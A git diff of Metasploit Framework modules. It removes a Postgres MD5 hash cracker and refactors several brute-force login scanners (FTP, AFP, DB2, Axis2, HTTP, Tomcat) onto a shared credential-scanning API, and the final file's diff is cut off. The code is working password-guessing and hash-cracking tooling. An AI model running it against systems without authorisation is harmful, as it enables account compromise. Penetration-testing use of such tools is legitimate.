diff --git a/modules/auxiliary/analyze/postgres_md5_crack.rb b/modules/auxiliary/analyze/postgres_md5_crack.rb
deleted file mode 100644
index 2b9c9df045..0000000000
--- a/modules/auxiliary/analyze/postgres_md5_crack.rb
+++ /dev/null
@@ -1,82 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-
-require 'msf/core'
-require 'digest/md5'
-
-class Metasploit3 < Msf::Auxiliary
-
-  #Included to grab the john.pot and use some utiltiy functions
-  include Msf::Auxiliary::JohnTheRipper
-
-  def initialize
-    super(
-      'Name'           => 'Postgres SQL md5 Password Cracker',
-      'Description'    => %Q{
-          This module attempts to crack Postgres SQL md5 password hashes.
-        It creates hashes based on information saved in the MSF Database
-        such as hostnames, usernames, passwords, and database schema information.
-        The user can also supply an additional external wordlist if they wish.
-      },
-      'Author'         => ['theLightCosine'],
-      'License'        => MSF_LICENSE
-    )
-
-
-    deregister_options('JOHN_BASE','JOHN_PATH')
-  end
-
-  def run
-
-    print_status("Processing wordlist...")
-    @seed= build_seed()
-
-    print_status("Wordlist length: #{@seed.length}")
-
-    myloots = myworkspace.loots.where('ltype=?', 'postgres.hashes')
-    unless myloots.nil?
-      myloots.each do |myloot|
-        begin
-          postgres_array = CSV.read(myloot.path).drop(1)
-        rescue
-          print_error("Unable to process #{myloot.path}")
-        end
-        postgres_array.each do |row|
-          print_status("Attempting to crack hash: #{row[0]}:#{row[1]}")
-          password = crack_hash(row[0],row[1])
-          if password
-            print_good("Username: #{row[0]} Pass: #{password}")
-            report_auth_info(
-              :host  => myloot.host.address,
-              :port => myloot.service.port,
-              :sname => 'postgres',
-              :user => row[0],
-              :pass => password
-            )
-
-          end
-        end
-      end
-    end
-
-  end
-
-  def crack_hash(username,hash)
-
-    @seed.each do |word|
-      tmphash =  Digest::MD5.hexdigest("#{word}#{username}")
-      if tmphash == hash
-        return word
-      end
-    end
-
-    return nil
-
-  end
-
-
-
-end
diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb
index c7b5dd6cde..78673a1e8d 100644
--- a/modules/auxiliary/docx/word_unc_injector.rb
+++ b/modules/auxiliary/docx/word_unc_injector.rb
@@ -3,9 +3,20 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+#
+# Gems
+#
+
+# for extracting files
+require 'zip'
+
+#
+# Project
+#
+
 require 'msf/core'
-require 'zip/zip' #for extracting files
-require 'rex/zip' #for creating files
+# for creating files
+require 'rex/zip'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -144,17 +155,17 @@ class Metasploit3 < Msf::Auxiliary
 
   #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way
   def unzip_docx
-    #Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::ZipFile
+    #Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::File
     vprint_status("Extracting #{datastore['SOURCE']} into memory.")
     #we read it all into memory
     zip_data = Hash.new
     begin
-      Zip::ZipFile.open(datastore['SOURCE'])  do |filezip|
+      Zip::File.open(datastore['SOURCE'])  do |filezip|
         filezip.each do |entry|
           zip_data[entry.name] = filezip.read(entry)
         end
       end
-    rescue Zip::ZipError => e
+    rescue Zip::Error => e
       print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.")
       return nil
     end
diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb
index f3affe799d..f55557941d 100644
--- a/modules/auxiliary/scanner/afp/afp_login.rb
+++ b/modules/auxiliary/scanner/afp/afp_login.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'openssl'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/afp'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -41,83 +43,70 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     print_status("Scanning IP: #{ip.to_s}")
-    begin
 
-    connect
-    info = get_info # get_info drops connection
-    raise "Unsupported AFP version" unless info[:uams].include?("DHCAST128")
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+    )
 
-    if datastore['CHECK_GUEST'] && info[:uams].include?("No User Authent")
-      connect
-      open_session
-      do_guest_login
-      close_session
-    end
+    scanner = Metasploit::Framework::LoginScanner::AFP.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: 30
+    )
 
-    each_user_pass do |user, pass|
-      if user == ''
-        return :skip_user # check guest login once per host
-      end
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'afp',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
 
-      vprint_status("Trying to login as '#{user}' with password '#{pass}'")
-      connect
-      open_session
-      status = do_login(user, pass)
-      close_session # close_session drops connection
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            username: result.credential.public
+        }
+        credential_data.merge!(service_data)
 
-      status
-    end
-    rescue ::Timeout::Error
-      raise $!
-    rescue ::Interrupt
-      raise $!
-    rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT
-    rescue ::Exception
-      print_error("#{rhost}:#{rport} #{$!.class} #{$!}")
-    ensure
-      close_session if sock
-      disconnect
-    end
-  end
+        credential_core = create_credential(credential_data)
 
-  def do_login(user, pass)
-    status = login(user, pass)
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
 
-    if status == true
-      status = :next_user
-      print_good("#{rhost} - SUCCESSFUL LOGIN '#{user}' : '#{pass}'")
-      report_auth_info({
-        :host        => rhost,
-        :port        => rport,
-        :sname       => 'afp',
-        :user        => user,
-        :pass        => pass,
-        :source_type => 'user_supplied',
-        :active      => true
-      })
-    end
-    return status
-  end
-
-  def do_guest_login
-    status = login('', '')
-    if status
-      status = :next_user
-      print_good("#{rhost} Supports Guest logins")
-
-      if datastore['RECORD_GUEST']
-        report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => 'atp',
-          :user => '',
-          :pass => '',
-          :type => "Guest Login",
-          :source_type => "user_supplied",
-          :active => true
-        )
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
     end
-    return status
   end
+
+
 end
diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb
index 0ba46d6973..77db75d7ff 100644
--- a/modules/auxiliary/scanner/db2/db2_auth.rb
+++ b/modules/auxiliary/scanner/db2/db2_auth.rb
@@ -5,7 +5,8 @@
 
 
 require 'msf/core'
-
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/db2'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -40,44 +41,71 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    each_user_pass { |user, pass|
-      do_login(user,pass,datastore['DATABASE'])
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+        realm: datastore['DATABASE']
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::DB2.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: 30
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'db2',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
     }
+
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            realm_key: Metasploit::Model::Realm::Key::DB2_DATABASE,
+            realm_value: result.credential.realm,
+            username: result.credential.public
+        }
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: Metasploit::Model::Realm::Key::DB2_DATABASE,
+            realm_value: result.credential.realm,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+      end
+    end
   end
 
-  def do_login(user=nil,pass=nil,db=nil)
-    datastore['USERNAME'] = user
-    datastore['PASSWORD'] = pass
-    vprint_status("#{rhost}:#{rport} - DB2 - Trying username:'#{user}' with password:'#{pass}'")
-
-    begin
-      info = db2_check_login
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} : Unable to attempt authentication")
-      return :abort
-    rescue ::Rex::Proto::DRDA::RespError => e
-      vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
-      return :abort
-    end
-
-    disconnect
-
-    if info[:db_login_success]
-      print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'")
-      # Report credentials
-      report_auth_info(
-        :host => rhost,
-        :port => rport,
-        :sname => "db2",
-        :user => "#{db}/#{user}",
-        :pass => pass,
-        :active => true
-        )
-      return :next_user
-    else
-      vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'")
-      return :fail
-    end
-
-  end
 end
diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb
index 063b8dd92a..b6e98732a8 100644
--- a/modules/auxiliary/scanner/ftp/ftp_login.rb
+++ b/modules/auxiliary/scanner/ftp/ftp_login.rb
@@ -4,6 +4,8 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/ftp'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -52,134 +54,98 @@ class Metasploit3 < Msf::Auxiliary
 
   def run_host(ip)
     print_status("#{ip}:#{rport} - Starting FTP login sweep")
-    if check_banner
-      @@credentials_tried = {}
-      if datastore['RECORD_GUEST'] == false and check_anonymous == :next_user
-        @accepts_all_logins[@access] ||= []
-        @accepts_all_logins[@access] << ip
-        print_status("Successful authentication with #{@access.to_s} access on #{ip} will not be reported")
+
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
+        prepended_creds: anonymous_creds
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::FTP.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: 30
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'ftp',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            username: result.credential.public
+        }
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            access_level: test_ftp_access(result.credential.public, scanner),
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
-      each_user_pass { |user, pass|
-        next if user.nil?
-        ret = do_login(user,pass)
-        ftp_quit if datastore['SINGLE_SESSION']
-        if ret == :next_user
-          unless user == user.downcase
-            ret = do_login(user.downcase,pass)
-            if ret == :next_user
-              user = user.downcase
-              print_status("Username #{user} is not case sensitive")
-            end
-          end
-          if datastore['RECORD_GUEST']
-            report_ftp_creds(user,pass,@access)
-          else
-            if @accepts_all_logins[@access]
-              report_ftp_creds(user,pass,@access) unless @accepts_all_logins[@access].include?(ip)
-            else
-              report_ftp_creds(user,pass,@access)
-            end
-          end
-        end
-        ret
-      }
-#			check_anonymous
-    else
-      return
     end
-    ftp_quit
+
   end
 
-  def ftp_quit
-    begin
-      send_quit if @ftp_sock
-    rescue ::Rex::ConnectionError, EOFError, ::Errno::ECONNRESET
-    end
-    disconnect if @ftp_sock
-    @ftp_sock = nil
-  end
 
   # Always check for anonymous access by pretending to be a browser.
-  def check_anonymous
-    browser_passwords = {}
-    browser_passwords['IE6'] = "IEUser@"
-    browser_passwords['IE8'] = "User@"
-    browser_passwords['Firefox'] = 'mozilla@example.com'
-    browser_passwords['Chrome'] = 'chrome@example.com'
-    unless @@credentials_tried.keys.include? "#{rhost}:#{rport}:anonymous"
-      do_login("anonymous",browser_passwords.values[rand(browser_passwords.size)])
-    end
-  end
-
-  def check_banner
-    @ftp_sock = connect(true, false)
-    if self.banner
-      banner_sanitized = Rex::Text.to_hex_ascii(self.banner.to_s)
-      print_status("#{rhost}:#{rport} - FTP Banner: '#{banner_sanitized}'")
-      report_service(:host => rhost, :port => rport, :name => "ftp", :info => banner_sanitized)
-      return true
-    else
-      print_error("#{rhost}:#{rport} - Did not get an FTP service banner")
-      return false
-    end
-  end
-
-  def do_login(user=nil,pass=nil)
-    vprint_status("#{rhost}:#{rport} - Attempting FTP login for '#{user}':'#{pass}'")
-    this_attempt ||= {}
-    this_attempt[[user,pass]] ||= 0
-    while this_attempt[[user,pass]] <= 3
-      @ftp_sock = connect(true,false) unless @ftp_sock
-      begin
-        user_response = send_user(user, @ftp_sock)
-        if user_response !~ /^(331|2)/
-          vprint_error("#{rhost}:#{rport} - The server rejected username: '#{user}'")
-          return :skip_user
-        end
-        pass_response = send_pass(pass, @ftp_sock)
-        if pass_response =~ /^2/
-          print_good("#{rhost}:#{rport} - Successful FTP login for '#{user}':'#{pass}'")
-          @access = test_ftp_access(user)
-          ftp_quit
-          return :next_user
-        else
-          vprint_status("#{rhost}:#{rport} - Failed FTP login for '#{user}':'#{pass}'")
-          return :fail
-        end
-      rescue ::Rex::ConnectionError, EOFError, ::Errno::ECONNRESET => e
-        this_attempt[[user,pass]] += 1
-        vprint_error "#{rhost}:#{rport} - Caught #{e.class}, reconnecting and retrying"
-        disconnect
-        @ftp_sock = nil
+  def anonymous_creds
+    anon_creds = [ ]
+    if datastore['RECORD_GUEST']
+      ['IEUser@', 'User@', 'mozilla@example.com', 'chrome@example.com' ].each do |password|
+        anon_creds << Metasploit::Framework::Credential.new(public: 'anonymous', private: password)
       end
     end
-    return :connection_error
+    anon_creds
   end
 
-  def test_ftp_access(user)
+  def test_ftp_access(user,scanner)
     dir = Rex::Text.rand_text_alpha(8)
-    write_check = send_cmd(['MKD', dir], true)
+    write_check = scanner.send_cmd(['MKD', dir], true)
     if write_check and write_check =~ /^2/
-      send_cmd(['RMD',dir], true)
+      scanner.send_cmd(['RMD',dir], true)
       print_status("#{rhost}:#{rport} - User '#{user}' has READ/WRITE access")
-      return :write
+      return 'Read/Write'
     else
       print_status("#{rhost}:#{rport} - User '#{user}' has READ access")
-      return :read
+      return 'Read-only'
     end
   end
 
-  def report_ftp_creds(user,pass,access)
-    report_auth_info(
-      :host => rhost,
-      :port => rport,
-      :sname => 'ftp',
-      :user => user,
-      :pass => pass,
-      :type => "password#{access == :read ? "_ro" : "" }",
-      :source_type => "user_supplied",
-      :active => true
-    )
-  end
 
 end
diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb
index dfda5560f7..363b0fece9 100644
--- a/modules/auxiliary/scanner/http/axis_login.rb
+++ b/modules/auxiliary/scanner/http/axis_login.rb
@@ -5,7 +5,7 @@
 
 
 require 'msf/core'
-
+require 'metasploit/framework/login_scanner/axis2'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -17,10 +17,12 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'Apache Axis2 v1.4.1 Brute Force Utility',
-      'Description'    => %q{This module attempts to login to an Apache Axis2 v1.4.1
-        instance using username and password combindations indicated by the USER_FILE,
-        PASS_FILE, and USERPASS_FILE options.
+      'Name'           => 'Apache Axis2 Brute Force Utility',
+      'Description'    => %q{
+        This module attempts to login to an Apache Axis2 instance using
+        username and password combindations indicated by the USER_FILE,
+        PASS_FILE, and USERPASS_FILE options. It has been verified to
+        work on at least versions 1.4.1 and 1.6.2.
       },
       'Author'         =>
         [
@@ -35,9 +37,9 @@ class Metasploit3 < Msf::Auxiliary
       'License'        => MSF_LICENSE
     )
 
-    register_options(
-      [ Opt::RPORT(8080),
-        OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
+    register_options( [
+      Opt::RPORT(8080),
+      OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
     ], self.class)
   end
 
@@ -49,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary
 
     print_status("Verifying login exists at #{target_url}")
     begin
-      res = send_request_cgi({
-          'method'  => 'GET',
-          'uri'     => datastore['URI']
-        }, 20)
+      send_request_cgi({
+        'method'  => 'GET',
+        'uri'     => datastore['URI']
+      }, 20)
     rescue
       print_error("The Axis2 login page does not exist at #{target_url}")
       return
@@ -60,46 +62,88 @@ class Metasploit3 < Msf::Auxiliary
 
     print_status "#{target_url} - Apache Axis - Attempting authentication"
 
-    each_user_pass { |user, pass|
-      do_login(user, pass)
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS'],
+    )
+
+    scanner = Metasploit::Framework::LoginScanner::Axis2.new(
+      host: ip,
+      port: rport,
+      uri: datastore['URI'],
+      proxies: datastore["PROXIES"],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 5,
+    )
+
+    scanner.scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
+        do_report(ip, rport, result)
+        :next_user
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+        :abort
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+      end
+    end
+
+  end
+
+  def do_report(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
 
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
-  def do_login(user=nil,pass=nil)
-    post_data = "userName=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&submit=+Login+"
-    vprint_status("#{target_url} - Apache Axis - Trying username:'#{user}' with password:'#{pass}'")
-
-    begin
-      res = send_request_cgi({
-        'method'  => 'POST',
-        'uri'     => datastore['URI'],
-        'data'    => post_data,
-      }, 20)
-
-      if (res and res.code == 200 and res.body.to_s.match(/upload/) != nil)
-        print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
-        report_auth_info(
-          :host   => rhost,
-          :port   => rport,
-          :sname => (ssl ? 'https' : 'http'),
-          :user   => user,
-          :pass   => pass,
-          :proof  => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}",
-          :source_type => "user_supplied",
-          :duplicate_ok => true,
-          :active => true
-        )
-
-      elsif(res and res.code == 200)
-        vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
-      else
-        vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")
-        return :abort
-      end
-
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    rescue ::Timeout::Error, ::Errno::EPIPE
-    end
-  end
 end
diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb
index 4626686a0c..b94f6c5787 100644
--- a/modules/auxiliary/scanner/http/http_login.rb
+++ b/modules/auxiliary/scanner/http/http_login.rb
@@ -6,6 +6,8 @@
 
 require 'msf/core'
 require 'rex/proto/ntlm/message'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/http'
 
 
 class Metasploit3 < Msf::Auxiliary
@@ -29,7 +31,13 @@ class Metasploit3 < Msf::Auxiliary
         [
           [ 'CVE', '1999-0502'] # Weak password
         ],
-      'License'        => MSF_LICENSE
+      'License'        => MSF_LICENSE,
+      # See https://dev.metasploit.com/redmine/issues/8814
+      #'DefaultOptions' => {
+      #  'USERPASS_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_userpass.txt"),
+      #  'USER_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt"),
+      #  'PASS_FILE' => File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt"),
+      #}
     )
 
     register_options(
@@ -48,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def find_auth_uri
 
-    if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
+    if datastore['AUTH_URI'].present?
       paths = [datastore['AUTH_URI']]
     else
       paths = %W{
@@ -68,8 +76,8 @@ class Metasploit3 < Msf::Auxiliary
         'password' => ''
       }, 10)
 
-      next if not res
-      if res.code == 301 or res.code == 302 and res.headers['Location'] and res.headers['Location'] !~ /^http/
+      next unless res
+      if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/
         path = res.headers['Location']
         vprint_status("Following redirect: #{path}")
         res = send_request_cgi({
@@ -80,6 +88,7 @@ class Metasploit3 < Msf::Auxiliary
         }, 10)
         next if not res
       end
+      next unless res.code == 401
 
       return path
     end
@@ -96,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
+    if (datastore['REQUESTTYPE'] == "PUT") && (datastore['AUTH_URI'].blank?)
       print_error("You need need to set AUTH_URI when using PUT Method !")
       return
     end
@@ -110,84 +119,92 @@ class Metasploit3 < Msf::Auxiliary
 
     print_status("Attempting to login to #{target_url}")
 
-    each_user_pass { |user, pass|
-      do_login(user, pass)
-    }
-  end
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS'],
+    )
 
-  def do_login(user='admin', pass='admin')
-    vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
+    scanner = Metasploit::Framework::LoginScanner::HTTP.new(
+      host: ip,
+      port: rport,
+      uri: @uri,
+      method: datastore['REQUESTTYPE'],
+      proxies: datastore["PROXIES"],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 5,
+    )
 
-    response  = do_http_login(user,pass)
-    result = determine_result(response)
-
-    if result == :success
-      print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
-
-      any_user = false
-      any_pass = false
-
-      vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
-      any_user  =  determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
-
-      vprint_status("#{target_url} - Trying username:'#{user}' with random password")
-      any_pass  = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
-
-      if any_user == :success
-        user = "anyuser"
-        print_status("#{target_url} - Any username with password '#{pass}' is allowed")
-      else
-        print_status("#{target_url} - Random usernames are not allowed.")
-      end
-
-      if any_pass == :success
-        pass = "anypass"
-        print_status("#{target_url} - Any password with username '#{user}' is allowed")
-      else
-        print_status("#{target_url} - Random passwords are not allowed.")
-      end
-
-      unless (user == "anyuser" and pass == "anypass")
-        report_auth_info(
-          :host   => rhost,
-          :port   => rport,
-          :sname => (ssl ? 'https' : 'http'),
-          :user   => user,
-          :pass   => pass,
-          :proof  => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
-          :source_type => "user_supplied",
-          :active => true
+    scanner.scan! do |result|
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
+        do_report(ip, rport, result)
+        :next_user
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
         )
+        :abort
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+      when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED
+        print_brute :level => :error, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        break
       end
-
-      return :abort if ([any_user,any_pass].include? :success)
-      return :next_user
-    else
-      vprint_error("#{target_url} - Failed to login as '#{user}'")
-      return
     end
+
   end
 
-  def do_http_login(user,pass)
-    begin
-      response = send_request_cgi({
-        'uri' => @uri,
-        'method' => datastore['REQUESTTYPE'],
-        'username' => user,
-        'password' => pass
-      })
-      return response
-    rescue ::Rex::ConnectionError
-      vprint_error("#{target_url} - Failed to connect to the web server")
-      return nil
-    end
-  end
+  def do_report(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
 
-  def determine_result(response)
-    return :abort unless response.kind_of? Rex::Proto::Http::Response
-    return :abort unless response.code
-    return :success if [200, 301, 302].include?(response.code)
-    return :fail
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :password,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
 end
diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
index 92c6141166..e98727c6dd 100644
--- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
+++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
@@ -4,6 +4,8 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/tomcat'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -91,60 +93,68 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
